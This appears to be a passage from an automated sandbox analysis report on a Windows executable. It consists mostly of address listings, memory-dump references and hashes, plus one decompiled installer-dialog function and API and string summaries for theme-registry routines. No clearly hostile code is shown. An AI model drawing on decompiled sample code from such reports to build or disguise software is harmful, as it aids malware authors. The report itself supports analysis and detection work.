                                                  0x00406b93
                                                  0x00406b96
                                                  0x00406b9c
                                                  0x00406b9d
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00406b9d
                                                  0x00406ba2
                                                  0x00406ba5
                                                  0x00406ba7
                                                  0x00406ba7
                                                  0x00406bad
                                                  0x00406baf
                                                  0x00406bc0
                                                  0x00406bb3
                                                  0x00406bb7
                                                  0x00406e5c
                                                  0x00000000
                                                  0x00406e5c
                                                  0x00406bbd
                                                  0x00406bbe
                                                  0x00406bbe
                                                  0x00406bc6
                                                  0x00406bc9
                                                  0x00406bcd
                                                  0x00406bcf
                                                  0x00406bd1
                                                  0x00406bd4
                                                  0x00000000
                                                  0x00000000
                                                  0x00406bdc
                                                  0x00406be2
                                                  0x00406be4
                                                  0x00406be6
                                                  0x00406be7
                                                  0x00406bfc
                                                  0x00406bfc
                                                  0x00406bff
                                                  0x00406c01
                                                  0x00406c01
                                                  0x00406c03
                                                  0x00406c08
                                                  0x00406c0a
                                                  0x00406c11
                                                  0x00406c13
                                                  0x00406c1b
                                                  0x00406c1b
                                                  0x00406c1d
                                                  0x00406c1e
                                                  0x00406c2d
                                                  0x00406c31
                                                  0x00406c35
                                                  0x00406c38
                                                  0x00406c3b
                                                  0x00406c40
                                                  0x00406c43
                                                  0x00406c49
                                                  0x00406c50
                                                  0x00406c56
                                                  0x00406e4f
                                                  0x00406e4f
                                                  0x00406e54
                                                  0x00406e63
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00406e54
                                                  0x00406c63
                                                  0x00406c66
                                                  0x00406c69
                                                  0x00406c6c
                                                  0x00406c70
                                                  0x00000000
                                                  0x00000000
                                                  0x00406c7b
                                                  0x00406c7e
                                                  0x00406c7f
                                                  0x00406c81
                                                  0x00406c87
                                                  0x00406c8a
                                                  0x00000000
                                                  0x00000000
                                                  0x00406c90
                                                  0x00406c91
                                                  0x00406c94
                                                  0x00406c97
                                                  0x00406c9a
                                                  0x00406ca0
                                                  0x00406ca2
                                                  0x00406ca2
                                                  0x00406caa
                                                  0x00406cae
                                                  0x00406cb3
                                                  0x00406cd8
                                                  0x00406cde
                                                  0x00406ce0
                                                  0x00406ce2
                                                  0x00406ce5
                                                  0x00406cee
                                                  0x00000000
                                                  0x00000000
                                                  0x00406cb5
                                                  0x00406cb5
                                                  0x00406cbe
                                                  0x00406cc2
                                                  0x00000000
                                                  0x00000000
                                                  0x00406cd3
                                                  0x00406cd3
                                                  0x00406cd6
                                                  0x00000000
                                                  0x00000000
                                                  0x00406cc6
                                                  0x00406cc9
                                                  0x00406ccb
                                                  0x00406ccf
                                                  0x00000000
                                                  0x00000000
                                                  0x00406cd1
                                                  0x00406cd1
                                                  0x00000000
                                                  0x00406cd3
                                                  0x00406cf7
                                                  0x00406cfd
                                                  0x00406d07
                                                  0x00406d09
                                                  0x00406d0e
                                                  0x00406d10
                                                  0x00406d46
                                                  0x00406d12
                                                  0x00406d12
                                                  0x00406d15
                                                  0x00406d18
                                                  0x00406d22
                                                  0x00406d25
                                                  0x00406d2c
                                                  0x00406d37
                                                  0x00406d3e
                                                  0x00406d3e
                                                  0x00406d48
                                                  0x00406d4b
                                                  0x00406d4d
                                                  0x00406d53
                                                  0x00406d53
                                                  0x00406d5c
                                                  0x00406d5f
                                                  0x00406d64
                                                  0x00406d73
                                                  0x00406d7b
                                                  0x00406d80
                                                  0x00406da4
                                                  0x00406dac
                                                  0x00406db0
                                                  0x00406db6
                                                  0x00406d82
                                                  0x00406d90
                                                  0x00406d93
                                                  0x00406d99
                                                  0x00406d99
                                                  0x00406dba
                                                  0x00406d75
                                                  0x00406d75
                                                  0x00406d75
                                                  0x00406dcb
                                                  0x00406dcf
                                                  0x00406ddb
                                                  0x00406dd6
                                                  0x00406dd9
                                                  0x00406dd9
                                                  0x00406de3
                                                  0x00406de8
                                                  0x00406df0
                                                  0x00406dec
                                                  0x00406dee
                                                  0x00406dee
                                                  0x00406df6
                                                  0x00406df8
                                                  0x00406dff
                                                  0x00406e09
                                                  0x00406e13
                                                  0x00406e2f
                                                  0x00406e33
                                                  0x00406c78
                                                  0x00406c7e
                                                  0x00406c7f
                                                  0x00406c81
                                                  0x00406c87
                                                  0x00406c8a
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00406c8a
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00406e15
                                                  0x00406e15
                                                  0x00406e15
                                                  0x00406e1a
                                                  0x00406e23
                                                  0x00406e2c
                                                  0x00000000
                                                  0x00406e2c
                                                  0x00406e39
                                                  0x00406e39
                                                  0x00406e3c
                                                  0x00406e43
                                                  0x00406e46
                                                  0x00000000
                                                  0x00406c69
                                                  0x00406be9
                                                  0x00406beb
                                                  0x00406beb
                                                  0x00406bef
                                                  0x00406bf2
                                                  0x00406bf3
                                                  0x00406bf3
                                                  0x00000000
                                                  0x00406beb
                                                  0x00406b5f
                                                  0x00406b65
                                                  0x00000000

                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.361724465.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.361715451.0000000000400000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361750806.0000000000407000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361760887.0000000000409000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361785333.000000000042C000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361805335.0000000000434000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361832060.0000000000437000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ac19822e65b9eb32b60c0006d09f593d524529e242751fff4e2df6e5f6ee417a
                                                  • Instruction ID: 226139066da84df80bc4b15dd4b3e380d67d521acd3bdc5c46ce9393f3ccc406
                                                  • Opcode Fuzzy Hash: ac19822e65b9eb32b60c0006d09f593d524529e242751fff4e2df6e5f6ee417a
                                                  • Instruction Fuzzy Hash: 8BC13B71A00219CBDF14CF68C4905EEB7B2FF99314F26826AD856BB384D7346952CF94
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 10015A1A, Relevance: .2, Instructions: 221COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.364511538.0000000010015000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.364460119.0000000010000000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.364466627.0000000010001000.00000020.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.364500007.000000001000F000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.364522887.0000000010017000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.364528614.000000001001A000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f9a43b7c50e93ea4ecb4cdfa1c7eca4a213ec3ac8ae3714a1824bfe2dbee7ef7
                                                  • Instruction ID: 5fe38d42531f784a224d3fecef2c7a20139bdf02c646c8dce6f358f423566a87
                                                  • Opcode Fuzzy Hash: f9a43b7c50e93ea4ecb4cdfa1c7eca4a213ec3ac8ae3714a1824bfe2dbee7ef7
                                                  • Instruction Fuzzy Hash: 75A1151485D2EDADDF06CBF985517FCBFB05E26102F4845CAE4E5A6283C13A938EDB21
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 10015A29, Relevance: .2, Instructions: 213COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.364511538.0000000010015000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.364460119.0000000010000000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.364466627.0000000010001000.00000020.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.364500007.000000001000F000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.364522887.0000000010017000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.364528614.000000001001A000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 7451c3b050b500f785c9848a886a6ef16453fa74494989cfc899055879a50539
                                                  • Instruction ID: 4721f06c7f859f75a57ba82df12e331963c7de30f973e1416f8305908413f415
                                                  • Opcode Fuzzy Hash: 7451c3b050b500f785c9848a886a6ef16453fa74494989cfc899055879a50539
                                                  • Instruction Fuzzy Hash: 78A1051485D2E9ADDF06CBF981507FCBFB05E2A102F4845C6E0E5E6283C13A938EDB21
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 1001561A, Relevance: .1, Instructions: 61COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.364511538.0000000010015000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.364460119.0000000010000000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.364466627.0000000010001000.00000020.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.364500007.000000001000F000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.364522887.0000000010017000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.364528614.000000001001A000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 33a51492acd799fda5257bf088777f214ccb1d9f9f441b58e2bbc693c92cdb2e
                                                  • Instruction ID: 10f8ed0a67d1b5b9b1597bdd4d8eca1eb8f457700e83ef57be7d0f61b44693c3
                                                  • Opcode Fuzzy Hash: 33a51492acd799fda5257bf088777f214ccb1d9f9f441b58e2bbc693c92cdb2e
                                                  • Instruction Fuzzy Hash: 8111C231A10209DFDB10DBAAD8888ADF7FDEF546D6B9540A9F805DB214E771DE80C6A0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 1001570A, Relevance: .0, Instructions: 26COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.364511538.0000000010015000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.364460119.0000000010000000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.364466627.0000000010001000.00000020.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.364500007.000000001000F000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.364522887.0000000010017000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.364528614.000000001001A000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: bc1e897972a7d9dc8875f39a415db8f1ab4cad54cee1718619e07451133396d9
                                                  • Instruction ID: a8b10e805ba595d6164c36b397a1c2bd290a90df7eda33313150419afd32a9fd
                                                  • Opcode Fuzzy Hash: bc1e897972a7d9dc8875f39a415db8f1ab4cad54cee1718619e07451133396d9
                                                  • Instruction Fuzzy Hash: 29E06D35764504DF8744CBA8D842D15B3E8EB08220B144290F815CF3E0E635ED40D650
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 10015748, Relevance: .0, Instructions: 23COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.364511538.0000000010015000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.364460119.0000000010000000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.364466627.0000000010001000.00000020.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.364500007.000000001000F000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.364522887.0000000010017000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.364528614.000000001001A000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 2c0ee92d967234240d1aeaee57440cb1fca394a3c7c5a1b28cb5c43ac66d8783
                                                  • Instruction ID: a544df41eb135a73c9f595c2bff29c4b6edbb5da40d65bdf48bc3a43505697b2
                                                  • Opcode Fuzzy Hash: 2c0ee92d967234240d1aeaee57440cb1fca394a3c7c5a1b28cb5c43ac66d8783
                                                  • Instruction Fuzzy Hash: 6BE08636714510CBC360CA19E585D56F3E8EB8C2F271A4469EC49DF751D271FC408A90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 100156CB, Relevance: .0, Instructions: 7COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.364511538.0000000010015000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.364460119.0000000010000000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.364466627.0000000010001000.00000020.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.364500007.000000001000F000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.364522887.0000000010017000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.364528614.000000001001A000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 7c05f99247aa81ce170190a3f42a6638173cba83a8e8f878aed30f5516b3ecb7
                                                  • Instruction ID: 01513cdb45ce42654985ae443ff07ed2023d2f9c2cc80418f216d1c85a703bac
                                                  • Opcode Fuzzy Hash: 7c05f99247aa81ce170190a3f42a6638173cba83a8e8f878aed30f5516b3ecb7
                                                  • Instruction Fuzzy Hash: ECC00139661A40CFCA55CF08C194E00B3F4FB5D760B068491E906CB732C234ED40DA40
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00403FCB, Relevance: 45.7, APIs: 20, Strings: 6, Instructions: 204windowstringCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 93%
                                                  			E00403FCB(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, int _a16) {
				char* _v8;
				signed int _v12;
				void* _v16;
				struct HWND__* _t52;
				intOrPtr _t71;
				intOrPtr _t85;
				long _t86;
				int _t98;
				struct HWND__* _t99;
				signed int _t100;
				intOrPtr _t107;
				intOrPtr _t109;
				int _t110;
				signed int* _t112;
				signed int _t113;
				char* _t114;
				CHAR* _t115;

				if(_a8 != 0x110) {
					if(_a8 != 0x111) {
						L11:
						if(_a8 != 0x4e) {
							if(_a8 == 0x40b) {
								 *0x42a080 =  *0x42a080 + 1;
							}
							L25:
							_t110 = _a16;
							L26:
							return E00403EEA(_a8, _a12, _t110);
						}
						_t52 = GetDlgItem(_a4, 0x3e8);
						_t110 = _a16;
						if( *((intOrPtr*)(_t110 + 8)) == 0x70b &&  *((intOrPtr*)(_t110 + 0xc)) == 0x201) {
							_t100 =  *((intOrPtr*)(_t110 + 0x1c));
							_t109 =  *((intOrPtr*)(_t110 + 0x18));
							_v12 = _t100;
							_v16 = _t109;
							_v8 = 0x42dbc0;
							if(_t100 - _t109 < 0x800) {
								SendMessageA(_t52, 0x44b, 0,  &_v16);
								SetCursor(LoadCursorA(0, 0x7f02));
								ShellExecuteA(_a4, "open", _v8, 0, 0, 1);
								SetCursor(LoadCursorA(0, 0x7f00));
								_t110 = _a16;
							}
						}
						if( *((intOrPtr*)(_t110 + 8)) != 0x700 ||  *((intOrPtr*)(_t110 + 0xc)) != 0x100) {
							goto L26;
						} else {
							if( *((intOrPtr*)(_t110 + 0x10)) == 0xd) {
								SendMessageA( *0x42ec28, 0x111, 1, 0);
							}
							if( *((intOrPtr*)(_t110 + 0x10)) == 0x1b) {
								SendMessageA( *0x42ec28, 0x10, 0, 0);
							}
							return 1;
						}
					}
					if(_a12 >> 0x10 != 0 ||  *0x42a080 != 0) {
						goto L25;
					} else {
						_t112 =  *0x429870 + 0x14;
						if(( *_t112 & 0x00000020) == 0) {
							goto L25;
						}
						 *_t112 =  *_t112 & 0xfffffffe | SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
						E00403EA5(SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
						E00404256();
						goto L11;
					}
				}
				_t98 = _a16;
				_t113 =  *(_t98 + 0x30);
				if(_t113 < 0) {
					_t107 =  *0x42e3fc; // 0x7a3d7a
					_t113 =  *(_t107 - 4 + _t113 * 4);
				}
				_t71 =  *0x42ec58; // 0x7a2864
				_push( *((intOrPtr*)(_t98 + 0x34)));
				_t114 = _t113 + _t71;
				_push(0x22);
				_a16 =  *_t114;
				_v12 = _v12 & 0x00000000;
				_t115 = _t114 + 1;
				_v16 = _t115;
				_v8 = E00403F97;
				E00403E83(_a4);
				_push( *((intOrPtr*)(_t98 + 0x38)));
				_push(0x23);
				E00403E83(_a4);
				CheckDlgButton(_a4, (0 | ( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
				E00403EA5( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001);
				_t99 = GetDlgItem(_a4, 0x3e8);
				E00403EB8(_t99);
				SendMessageA(_t99, 0x45b, 1, 0);
				_t85 =  *0x42ec30; // 0x79ee58
				_t86 =  *(_t85 + 0x68);
				if(_t86 < 0) {
					_t86 = GetSysColor( ~_t86);
				}
				SendMessageA(_t99, 0x443, 0, _t86);
				SendMessageA(_t99, 0x445, 0, 0x4010000);
				 *0x429064 =  *0x429064 & 0x00000000;
				SendMessageA(_t99, 0x435, 0, lstrlenA(_t115));
				SendMessageA(_t99, 0x449, _a16,  &_v16);
				 *0x42a080 =  *0x42a080 & 0x00000000;
				return 0;
			}




















                                                  0x00403fdb
                                                  0x00404101
                                                  0x0040415d
                                                  0x00404161
                                                  0x00404238
                                                  0x0040423a
                                                  0x0040423a
                                                  0x00404240
                                                  0x00404240
                                                  0x00404243
                                                  0x00000000
                                                  0x0040424a
                                                  0x0040416f
                                                  0x00404171
                                                  0x0040417b
                                                  0x00404186
                                                  0x00404189
                                                  0x0040418c
                                                  0x00404197
                                                  0x0040419a
                                                  0x004041a1
                                                  0x004041af
                                                  0x004041c7
                                                  0x004041da
                                                  0x004041ea
                                                  0x004041ec
                                                  0x004041ec
                                                  0x004041a1
                                                  0x004041f6
                                                  0x00000000
                                                  0x00404201
                                                  0x00404205
                                                  0x00404216
                                                  0x00404216
                                                  0x0040421c
                                                  0x0040422a
                                                  0x0040422a
                                                  0x00000000
                                                  0x0040422e
                                                  0x004041f6
                                                  0x0040410c
                                                  0x00000000
                                                  0x00404120
                                                  0x00404126
                                                  0x0040412c
                                                  0x00000000
                                                  0x00000000
                                                  0x00404151
                                                  0x00404153
                                                  0x00404158
                                                  0x00000000
                                                  0x00404158
                                                  0x0040410c
                                                  0x00403fe1
                                                  0x00403fe4
                                                  0x00403fe9
                                                  0x00403feb
                                                  0x00403ffa
                                                  0x00403ffa
                                                  0x00403ffc
                                                  0x00404001
                                                  0x00404004
                                                  0x00404006
                                                  0x0040400b
                                                  0x00404014
                                                  0x0040401a
                                                  0x00404026
                                                  0x00404029
                                                  0x00404032
                                                  0x00404037
                                                  0x0040403a
                                                  0x0040403f
                                                  0x00404056
                                                  0x0040405d
                                                  0x00404070
                                                  0x00404073
                                                  0x00404088
                                                  0x0040408a
                                                  0x0040408f
                                                  0x00404094
                                                  0x00404099
                                                  0x00404099
                                                  0x004040a8
                                                  0x004040b7
                                                  0x004040b9
                                                  0x004040cf
                                                  0x004040de
                                                  0x004040e0
                                                  0x00000000

                                                  APIs
                                                  • CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 00404056
                                                  • GetDlgItem.USER32 ref: 0040406A
                                                  • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 00404088
                                                  • GetSysColor.USER32(?), ref: 00404099
                                                  • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 004040A8
                                                  • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 004040B7
                                                  • lstrlenA.KERNEL32(?), ref: 004040C1
                                                  • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 004040CF
                                                  • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 004040DE
                                                  • GetDlgItem.USER32 ref: 00404141
                                                  • SendMessageA.USER32(00000000), ref: 00404144
                                                  • GetDlgItem.USER32 ref: 0040416F
                                                  • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 004041AF
                                                  • LoadCursorA.USER32 ref: 004041BE
                                                  • SetCursor.USER32(00000000), ref: 004041C7
                                                  • ShellExecuteA.SHELL32(0000070B,open,0042DBC0,00000000,00000000,00000001), ref: 004041DA
                                                  • LoadCursorA.USER32 ref: 004041E7
                                                  • SetCursor.USER32(00000000), ref: 004041EA
                                                  • SendMessageA.USER32(00000111,00000001,00000000), ref: 00404216
                                                  • SendMessageA.USER32(00000010,00000000,00000000), ref: 0040422A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.361724465.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.361715451.0000000000400000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361750806.0000000000407000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361760887.0000000000409000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361785333.000000000042C000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361805335.0000000000434000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361832060.0000000000437000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                  • String ID: N$Xy$d(z$open$rtrystwqtc$z=z
                                                  • API String ID: 3615053054-1267446240
                                                  • Opcode ID: c58a0b319f6ceee57a7eba4f5dbe9c3c6e8762fb962b098a8fd1953549ce9262
                                                  • Instruction ID: 220b67e7875a360065d3b56f20ed6dbf7aa7168a1850c9919f5fb7903a7ea725
                                                  • Opcode Fuzzy Hash: c58a0b319f6ceee57a7eba4f5dbe9c3c6e8762fb962b098a8fd1953549ce9262
                                                  • Instruction Fuzzy Hash: C861F271A40309BFEB109F61CC45F6A3B69FB44715F10403AFB04BA2D1C7B8AA51CB99
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 10002AF0, Relevance: 38.7, APIs: 15, Strings: 7, Instructions: 196registrystringCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • lstrcpynW.KERNEL32 ref: 10002B7A
                                                  • lstrcpynW.KERNEL32 ref: 10002BAE
                                                  • lstrcpynW.KERNEL32 ref: 10002BE2
                                                  • RegCreateKeyW.ADVAPI32 ref: 10002C44
                                                  • RegSetValueExW.ADVAPI32 ref: 10002CAA
                                                  • lstrlenW.KERNEL32 ref: 10002CC9
                                                  • RegSetValueExW.ADVAPI32 ref: 10002D0B
                                                  • lstrlenW.KERNEL32 ref: 10002D20
                                                    • Part of subcall function 100015C0: RegCreateKeyExW.ADVAPI32 ref: 10001625
                                                    • Part of subcall function 100015C0: SystemParametersInfoW.USER32 ref: 10001678
                                                    • Part of subcall function 100015C0: RegSetValueExW.ADVAPI32 ref: 100016C1
                                                    • Part of subcall function 100015C0: _memset.LIBCMT ref: 10001701
                                                    • Part of subcall function 100015C0: SystemParametersInfoW.USER32 ref: 10001731
                                                    • Part of subcall function 100015C0: RegSetValueExW.ADVAPI32 ref: 1000177A
                                                    • Part of subcall function 10001850: RegOpenKeyExW.ADVAPI32 ref: 10001896
                                                    • Part of subcall function 10001850: RegOpenKeyExW.ADVAPI32 ref: 100018D7
                                                    • Part of subcall function 10001850: RegQueryValueExA.ADVAPI32 ref: 10001950
                                                    • Part of subcall function 10001850: RegCloseKey.ADVAPI32 ref: 10001A13
                                                  • RegSetValueExW.ADVAPI32 ref: 10002D62
                                                  • lstrlenW.KERNEL32 ref: 10002D77
                                                  • RegSetValueExW.ADVAPI32 ref: 10002DB9
                                                  • RegCloseKey.ADVAPI32 ref: 10002E1E
                                                    • Part of subcall function 10001C20: SystemParametersInfoW.USER32 ref: 10001C76
                                                    • Part of subcall function 10001C20: SystemParametersInfoW.USER32 ref: 10001CB0
                                                    • Part of subcall function 10001C20: _memset.LIBCMT ref: 10001CF0
                                                    • Part of subcall function 10001C20: SystemParametersInfoW.USER32 ref: 10001D20
                                                    • Part of subcall function 10001C20: SystemParametersInfoW.USER32 ref: 10001D50
                                                    • Part of subcall function 10001C20: _memset.LIBCMT ref: 10001D88
                                                    • Part of subcall function 10001C20: SystemParametersInfoW.USER32 ref: 10001DAE
                                                    • Part of subcall function 10001C20: SystemParametersInfoW.USER32 ref: 10001DDE
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.364466627.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.364460119.0000000010000000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.364500007.000000001000F000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.364511538.0000000010015000.00000040.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.364522887.0000000010017000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.364528614.000000001001A000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: InfoParametersSystem$Value$_memsetlstrcpynlstrlen$CloseCreateOpen$Query
                                                  • String ID: ColorName$DllName$Failed to open theme registry key$SizeName$Software\Microsoft\Windows\CurrentVersion\ThemeManager$ThemeActive$Writing theme config to registry
                                                  • API String ID: 3942574804-3345009166
                                                  • Opcode ID: 65653423d6b76968eb8e77c38cbbda078b2032a498a60aa22b66a6c694e172ab
                                                  • Instruction ID: 0d41eca8f7ee2a1d86389d51d41f50bf878ec644b8eeb07a56fe3d75f881ce66
                                                  • Opcode Fuzzy Hash: 65653423d6b76968eb8e77c38cbbda078b2032a498a60aa22b66a6c694e172ab
                                                  • Instruction Fuzzy Hash: ABA1A0B58043149FEB04EF68C98969EBBF0FF44344F40C92EE89997354E7759688CB82
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 10001850, Relevance: 31.7, APIs: 12, Strings: 6, Instructions: 210registryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.364466627.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.364460119.0000000010000000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.364500007.000000001000F000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.364511538.0000000010015000.00000040.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.364522887.0000000010017000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.364528614.000000001001A000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: QueryValue$InfoParametersSystem$CloseOpen$Colors
                                                  • String ID: %d %d %d$Control Panel\Colors$IconTitleFont$NonClientMetrics$Software\Microsoft\Windows\CurrentVersion\ThemeManager$\
                                                  • API String ID: 4292236304-3791924741
                                                  • Opcode ID: 44bd695f262025842f754ecddfeaa043a753f9a014f6dbb75529d67042742ba0
                                                  • Instruction ID: 3956e4e7eaf4b02e33c6377e1929b27839ec3ebb8081a15dc899d11a3c97f797
                                                  • Opcode Fuzzy Hash: 44bd695f262025842f754ecddfeaa043a753f9a014f6dbb75529d67042742ba0
                                                  • Instruction Fuzzy Hash: E6B1B3B59043199FDB14DF68C98479EBBF4FB88340F0089AEE499A3354D7749A84CF92
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 10001080, Relevance: 31.7, APIs: 8, Strings: 10, Instructions: 206registrystringCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.364466627.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.364460119.0000000010000000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.364500007.000000001000F000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.364511538.0000000010015000.00000040.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.364522887.0000000010017000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.364528614.000000001001A000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: QueryValue$lstrcpyn$CloseErrorLastOpen
                                                  • String ID: ColorName$DllName$Failed to get ThemeActive: %d$Failed to open theme registry key$Loading theme config$SizeName$Software\Microsoft\Windows\CurrentVersion\ThemeManager$Theme active: %s %s %s$ThemeActive$Theming not active
                                                  • API String ID: 553329553-3690341922
                                                  • Opcode ID: 512619281aa8912ba6cb58a1c67aed12e23ca439f4c3fb6303fbfe7ef993d899
                                                  • Instruction ID: c3f5730b06fc6cc22aebf362673d5ee39f3770c1a533f687f76a1476411486dd
                                                  • Opcode Fuzzy Hash: 512619281aa8912ba6cb58a1c67aed12e23ca439f4c3fb6303fbfe7ef993d899
                                                  • Instruction Fuzzy Hash: CEA190B49097149FE704EF64C5957ADBBF1FB48300F10886EE88997391EB749684CF52
                                                  Uniqueness

